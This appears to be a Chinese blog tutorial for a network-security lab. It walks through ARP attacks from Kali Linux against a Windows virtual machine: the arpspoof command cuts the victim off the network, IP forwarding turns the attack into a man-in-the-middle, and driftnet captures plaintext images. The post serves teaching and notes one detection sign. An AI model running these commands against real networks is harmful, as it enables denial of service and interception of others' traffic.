网络协议与攻击模拟_03实施ARP欺骗和攻击

一、ARP攻击

1、实验环境

  • kali Linux (安装arpspoof工具)
  • 被攻击主机

2、kali配置

kali Linux系统是基于debian Linux系统,采用deb包管理方式,可以使用apt源的方式进行直接从源的安装。

  • 配置kali网络源

    vim /etc/apt/sources.list

    apt-get-update

  • 安装工具

    apt-get install dsniff

3、实验步骤

(1)准备工作

  • windows虚拟机与kali虚拟机的IP和MAC地址如下:
  • 开始Windows可正常访问网络

(2)实施攻击

复制代码
arpspoof -i eth0 -t 被攻击主机IP地址 被攻击主机网关地址

kali 不停向被攻击主机发送ARP响应,告诉被攻击主机网关的MAC地址是0:c:29:e2:44:49

(3)攻击效果

被攻击主机无法访问网络

  • winshark&arp缓存情况

被攻击主机无法进行网络通信

如果出现了响应报文过多,还跟有可能就是遭受了ARP攻击。

二、实施ARP欺骗

1、开启攻击机的IP转发

开启kali的IP转发

bash 复制代码
vim /proc/sys/net/ipv4/ip_forward
#这个文件写1代表开启,写0代表关闭

echo 1 >> /proc/sys/net/ipv4/ip_forward  

2、被攻击主机可访问网络

  • windows发出的所有数据都会经过kali进行转发。
  • kali自带抓包工具winshark可以抓包看看

如果遇到kali自带的winshark闪退请使用以下命令更新:

bash 复制代码
apt update &&apt upgrade &&apt dist-upgrade

3、driftne监听工具

(抓取被攻击主机上明文的图片)

bash 复制代码
#安装driftnet
apt-get install driftnet
#启用driftnet
driftnet -i ethernet0
相关推荐
SongYuLong的博客2 小时前
TL-WR710N-V2.1 硬改刷机OpenWRT源码编译固件
linux·物联网·网络协议
AUTOSAR组织7 小时前
深入解析AUTOSAR框架下的TCP/IP协议栈
网络协议·tcp/ip·汽车·autosar·软件架构·软件·培训
googleccsdn7 小时前
ENSP Pro LAB笔记:配置M-LAG双归接入三层网络(V-STP + Monitor Link + OSPF)
网络·笔记·网络协议
Knight_AL8 小时前
WebRTC / HLS / HTTP-FLV 的本质区别与选型指南
网络协议·http·webrtc
程序猿编码9 小时前
高性能HTTP服务压测工具:设计思路与实现原理(C/C++代码实现)
c语言·网络·c++·网络协议·tcp/ip·http
IT学习资源每日免费分享12 小时前
网络安全系列课程合集,含病毒分析、红队安全、攻防安全等教程汇总
网络·网络协议·计算机网络·系统安全
czy878747512 小时前
在 LwIP 中,select() 函数返回值小于等于 0 通常表示发生了错误或超时
网络协议
czy878747513 小时前
深入理解 TCP 协议中三次握手建立连接和四次挥手关闭连接的核心逻辑
网络·网络协议·tcp/ip
这儿有一堆花14 小时前
实战:FastAPI与WebSocket的高并发足球数据API开发指南
websocket·网络协议·fastapi
数通工程师14 小时前
实操教程:华为防火墙HRP主备模式完整配置步骤
运维·服务器·网络·网络协议·tcp/ip·华为